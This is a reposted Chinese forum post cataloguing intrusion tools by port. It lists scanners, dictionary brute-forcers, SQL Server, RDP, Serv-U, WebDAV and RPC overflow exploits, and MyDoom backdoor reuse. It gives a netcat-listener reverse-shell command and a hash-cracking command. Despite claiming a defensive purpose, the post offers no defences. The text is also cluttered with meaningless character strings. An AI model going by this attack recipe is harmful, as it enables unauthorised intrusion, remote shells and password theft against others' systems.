该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
?) S3 J5 @6 b- E1 K9 w5 D, |2 C
$ v6 B3 O/ j A8 W9 ~& k0 ^; w) ~2 d W
1. 1433端口入侵 7 b$ o, B2 h( c4 F5 e0 h5 @
8 n, _7 a: Z1 @3 u8 o7 z6 @
scanport.exe 查有1433的机器 % I8 J/ R2 D9 x+ s: y- [: T4 p
$ d3 K) ?. O9 A% d& R2 {: H2 U SQLScanPass.exe 进行字典暴破(字典是关键) : h& Q3 N7 ]) q+ v- {
4 Q9 U0 O/ }5 c$ z 最后 SQLTools.exe入侵 / H$ _2 L" u. ]
7 j( W( b: C* A* R. d* ? =============================
, g% n2 d' u$ b8 }2 ]9 U$ Q! X2 m0 _8 c# \7 v1 `& U
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 6 R% g" h& V. g$ O' T' c# I$ b) ~" _1 F
) R( z* k8 h; J( k5 J nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
4 O0 l& v% J5 M* M. B0 E
- N$ I$ t( ?, ^ (以上反向的,测试成功) ; F* O' a& h, u8 F
7 E1 q! Z% _! y/ V Q8 L3 L$ G sqlhelloz.exe 入侵ip 1433 (这个是正向连接) . O0 v3 T6 g, t- b2 m
' o% }' I$ i9 Q: ~3 S7 L- E 2. 4899端口入侵 5 d# s! @3 ]/ E+ p
1 U& g3 Q- [/ G
用4899过滤器.exe,扫描空口令的机器 # Q3 \8 z4 ?) A* r; `5 D% T
% J! R: ^' M7 F) l- e( Z" F
3. 3899的入侵 : X% h, M- |6 _: [( v
: ^$ B2 |# y7 G4 W
对很早的机器,可以试试3389的溢出(win3389ex.exe)
; i7 ]! u# j) z5 E; D" x
0 u5 A. ~, y: d" x5 g& x$ u 对2000的机器,可以试试字典暴破。(tscrack.exe) 6 e# Q* T% k. B7 N; n% h# Y O
% R- z x) w' u3 x 4. 80入侵 ) u" `. _# r3 ^: V
1 w, q( D- N% d" _! }+ g
对sp3以前的机器,可以用webdav入侵; 7 Q V% C) B, n6 g) { M$ |# E" x3 I+ g( L
5 }' w* y; V+ U: A' [
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) # ^& P# `+ p. k% D5 [3 G6 ]
7 ^! v* N9 q8 O# n- I& k
可以利用SQL进行注入。(小榕的注入软件)。
) M- f, q: h9 N' T, j/ w( B. g) e
6 f# t4 t5 g9 a! p% p4 M4 l 5. serv-u入侵(21端口)
0 a0 t* J1 `- s' i% F( P3 U6 }3 N( o' I
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
# |* h- u7 Z5 Z0 g' o4 e) ]# C3 p" D5 B
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
8 _0 C. j0 w5 _$ w/ P, g& ?+ S+ u2 f
======================================
; C; w' g- p+ I8 q) |6 r2 ?' i- p
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
# D* @: p0 j3 z/ c! v; k
+ O9 `+ k; P, b! X0 @. `- w 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
* _+ V& I# X7 `+ Y" i / m0 M$ _3 a7 f
6. 554端口 b( z# o4 ]) q; G1 G4 K
% ~2 h, \6 A5 V( X; ? 用real554.exe入侵。
! U9 m% I( f( [/ p( [# H
9 M( h" O/ S) W- k; v: O 7. 6129端口
3 s$ F, d# t5 I, \
+ r D7 q8 {- c# c4 m8 n) L. E 用DameWare6129.exe入侵。 , O/ l! _) {# K: q
1 o" U! ^ D8 ?1 Y
8. 系统漏洞 7 B+ R2 M8 t7 [" X7 l3 @0 w
0 Q$ y7 `2 h. I9 ^4 p
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, " S3 l/ M5 T) ]* M4 i& s ^
6 I5 v i( n* n& F$ F# v
进行溢出入侵。
5 o. B6 Y. w* G% E% C
+ Y* |# v# n5 @6 L5 [' ~7 G n4 P 9. 3127等端口
/ i' a+ r5 A X) o6 h6 a. d* K
9 p! b+ V# Q$ R 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 3 W6 X! p2 K" F0 p/ r* }$ U7 j
, S$ g9 n$ E3 B- I$ q o. ~' t 10. 其他入侵 - _* k, G5 F7 }6 q$ ]- n
" ^% ^$ e0 l" L# m
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
* V6 W$ z% H0 e9 r/ w6 w! l# E1 @$ e ~
转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|